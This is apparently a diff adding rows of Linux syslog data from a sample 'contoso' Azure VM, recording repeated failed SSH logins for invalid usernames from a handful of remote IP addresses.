+18645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:47,UbuntuDevEnv,2019-06-26 10:35:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:47,UbuntuDevEnv,2019-06-26 10:35:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,86663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:48,UbuntuDevEnv,2019-06-26 10:35:47,auth,UbuntuDevEnv,info,Failed password for invalid user semik from 200.209.174.76 port 39288 ssh2,86663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,200.209.174.7,39288,,
+18648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:48,UbuntuDevEnv,2019-06-26 10:35:48,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 39288:11: Bye Bye [preauth],86663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,39288,,
+18649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:48,UbuntuDevEnv,2019-06-26 10:35:48,auth,UbuntuDevEnv,info,Disconnected from invalid user semik 200.209.174.76 port 39288 [preauth],86663,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,semik,200.209.174.7,39288,,
+18650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:54,UbuntuDevEnv,2019-06-26 10:35:54,auth,UbuntuDevEnv,info,Invalid user marek from 37.59.6.106 port 33740,86694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,37.59.6.1,33740,,
+18651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:54,UbuntuDevEnv,2019-06-26 10:35:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,86694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:54,UbuntuDevEnv,2019-06-26 10:35:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:56,UbuntuDevEnv,2019-06-26 10:35:56,auth,UbuntuDevEnv,info,Failed password for invalid user marek from 37.59.6.106 port 33740 ssh2,86694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,37.59.6.1,33740,,
+18654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:56,UbuntuDevEnv,2019-06-26 10:35:56,auth,UbuntuDevEnv,info,Disconnected from invalid user marek 37.59.6.106 port 33740 [preauth],86694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marek,37.59.6.1,33740,,
+18655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:35:56,UbuntuDevEnv,2019-06-26 10:35:56,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 33740:11: Bye Bye [preauth],86694,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,33740,,
+18656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:00,UbuntuDevEnv,2019-06-26 10:37:00,auth,UbuntuDevEnv,info,Invalid user chiradip from 47.44.115.81 port 38924,86928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiradip,47.44.115.8,38924,,
+18657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:00,UbuntuDevEnv,2019-06-26 10:37:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:00,UbuntuDevEnv,2019-06-26 10:37:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,86928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:03,UbuntuDevEnv,2019-06-26 10:37:02,auth,UbuntuDevEnv,info,Failed password for invalid user chiradip from 47.44.115.81 port 38924 ssh2,86928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiradip,47.44.115.8,38924,,
+18660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:03,UbuntuDevEnv,2019-06-26 10:37:02,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 38924:11: Bye Bye [preauth],86928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,38924,,
+18661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:03,UbuntuDevEnv,2019-06-26 10:37:02,auth,UbuntuDevEnv,info,Disconnected from invalid user chiradip 47.44.115.81 port 38924 [preauth],86928,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,chiradip,47.44.115.8,38924,,
+18662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:04,UbuntuDevEnv,2019-06-26 10:37:04,auth,UbuntuDevEnv,info,Invalid user admin from 106.13.142.247 port 45432,86943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,45432,,
+18663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:04,UbuntuDevEnv,2019-06-26 10:37:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,86943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:04,UbuntuDevEnv,2019-06-26 10:37:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,86943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:06,UbuntuDevEnv,2019-06-26 10:37:05,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 106.13.142.247 port 45432 ssh2,86943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,45432,,
+18666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:06,UbuntuDevEnv,2019-06-26 10:37:06,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 106.13.142.247 port 45432 [preauth],86943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,45432,,
+18667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:06,UbuntuDevEnv,2019-06-26 10:37:06,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 45432:11: Bye Bye [preauth],86943,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,45432,,
+18668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:21,UbuntuDevEnv,2019-06-26 10:37:20,auth,UbuntuDevEnv,info,Invalid user tiago from 37.59.6.106 port 50650,87014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tiago,37.59.6.1,50650,,
+18669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:21,UbuntuDevEnv,2019-06-26 10:37:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:21,UbuntuDevEnv,2019-06-26 10:37:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,87014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:23,UbuntuDevEnv,2019-06-26 10:37:22,auth,UbuntuDevEnv,info,Failed password for invalid user tiago from 37.59.6.106 port 50650 ssh2,87014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tiago,37.59.6.1,50650,,
+18672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:23,UbuntuDevEnv,2019-06-26 10:37:23,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 50650:11: Bye Bye [preauth],87014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,50650,,
+18673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:37:23,UbuntuDevEnv,2019-06-26 10:37:23,auth,UbuntuDevEnv,info,Disconnected from invalid user tiago 37.59.6.106 port 50650 [preauth],87014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tiago,37.59.6.1,50650,,
+18674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:38,UbuntuDevEnv,2019-06-26 10:38:37,auth,UbuntuDevEnv,info,Invalid user yin from 200.209.174.76 port 47744,87285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,200.209.174.7,47744,,
+18675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:38,UbuntuDevEnv,2019-06-26 10:38:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:38,UbuntuDevEnv,2019-06-26 10:38:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,87285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:38,UbuntuDevEnv,2019-06-26 10:38:37,auth,UbuntuDevEnv,info,Invalid user toby from 106.13.142.247 port 57690,87277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toby,106.13.142.2,57690,,from
+18678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:38,UbuntuDevEnv,2019-06-26 10:38:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:38,UbuntuDevEnv,2019-06-26 10:38:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,87277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:40,UbuntuDevEnv,2019-06-26 10:38:40,auth,UbuntuDevEnv,info,Failed password for invalid user yin from 200.209.174.76 port 47744 ssh2,87285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,200.209.174.7,47744,,
+18681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:40,UbuntuDevEnv,2019-06-26 10:38:40,auth,UbuntuDevEnv,info,Failed password for invalid user toby from 106.13.142.247 port 57690 ssh2,87277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toby,106.13.142.2,57690,,from
+18682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:40,UbuntuDevEnv,2019-06-26 10:38:40,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 47744:11: Bye Bye [preauth],87285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,47744,,
+18683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:40,UbuntuDevEnv,2019-06-26 10:38:40,auth,UbuntuDevEnv,info,Disconnected from invalid user yin 200.209.174.76 port 47744 [preauth],87285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yin,200.209.174.7,47744,,
+18684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:41,UbuntuDevEnv,2019-06-26 10:38:40,auth,UbuntuDevEnv,info,Disconnected from invalid user toby 106.13.142.247 port 57690 [preauth],87277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toby,106.13.142.2,57690,,
+18685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:41,UbuntuDevEnv,2019-06-26 10:38:40,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 57690:11: Bye Bye [preauth],87277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,57690,,
+18686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:50,UbuntuDevEnv,2019-06-26 10:38:50,auth,UbuntuDevEnv,info,Invalid user dell from 37.59.6.106 port 39332,87333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dell,37.59.6.1,39332,,
+18687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:50,UbuntuDevEnv,2019-06-26 10:38:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:50,UbuntuDevEnv,2019-06-26 10:38:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,87333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:52,UbuntuDevEnv,2019-06-26 10:38:52,auth,UbuntuDevEnv,info,Failed password for invalid user dell from 37.59.6.106 port 39332 ssh2,87333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dell,37.59.6.1,39332,,
+18690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:52,UbuntuDevEnv,2019-06-26 10:38:52,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 39332:11: Bye Bye [preauth],87333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,39332,,
+18691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:38:52,UbuntuDevEnv,2019-06-26 10:38:52,auth,UbuntuDevEnv,info,Disconnected from invalid user dell 37.59.6.106 port 39332 [preauth],87333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dell,37.59.6.1,39332,,
+18692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:39:05,UbuntuDevEnv,2019-06-26 10:39:05,auth,UbuntuDevEnv,info,Invalid user ocelot from 47.44.115.81 port 56168,87378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,47.44.115.8,56168,,
+18693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:39:05,UbuntuDevEnv,2019-06-26 10:39:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:39:05,UbuntuDevEnv,2019-06-26 10:39:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,87378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:39:08,UbuntuDevEnv,2019-06-26 10:39:08,auth,UbuntuDevEnv,info,Failed password for invalid user ocelot from 47.44.115.81 port 56168 ssh2,87378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,47.44.115.8,56168,,
+18696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:39:08,UbuntuDevEnv,2019-06-26 10:39:08,auth,UbuntuDevEnv,info,Disconnected from invalid user ocelot 47.44.115.81 port 56168 [preauth],87378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ocelot,47.44.115.8,56168,,
+18697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:39:08,UbuntuDevEnv,2019-06-26 10:39:08,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 56168:11: Bye Bye [preauth],87378,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,56168,,
+18698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:12,UbuntuDevEnv,2019-06-26 10:40:12,auth,UbuntuDevEnv,info,Invalid user amittal from 106.13.142.247 port 41714,87614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amittal,106.13.142.2,41714,,
+18699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:12,UbuntuDevEnv,2019-06-26 10:40:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,87614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:12,UbuntuDevEnv,2019-06-26 10:40:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,87614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:14,UbuntuDevEnv,2019-06-26 10:40:14,auth,UbuntuDevEnv,info,Failed password for invalid user amittal from 106.13.142.247 port 41714 ssh2,87614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amittal,106.13.142.2,41714,,
+18702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:15,UbuntuDevEnv,2019-06-26 10:40:14,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 41714:11: Bye Bye [preauth],87614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,41714,,
+18703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:15,UbuntuDevEnv,2019-06-26 10:40:14,auth,UbuntuDevEnv,info,Disconnected from invalid user amittal 106.13.142.247 port 41714 [preauth],87614,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amittal,106.13.142.2,41714,,
+18704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:40:16,UbuntuDevEnv,2019-06-26 10:40:16,auth,UbuntuDevEnv,info,Invalid user zachary from 37.59.6.106 port 56246,87638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zachary,37.59.6.1,56246,,
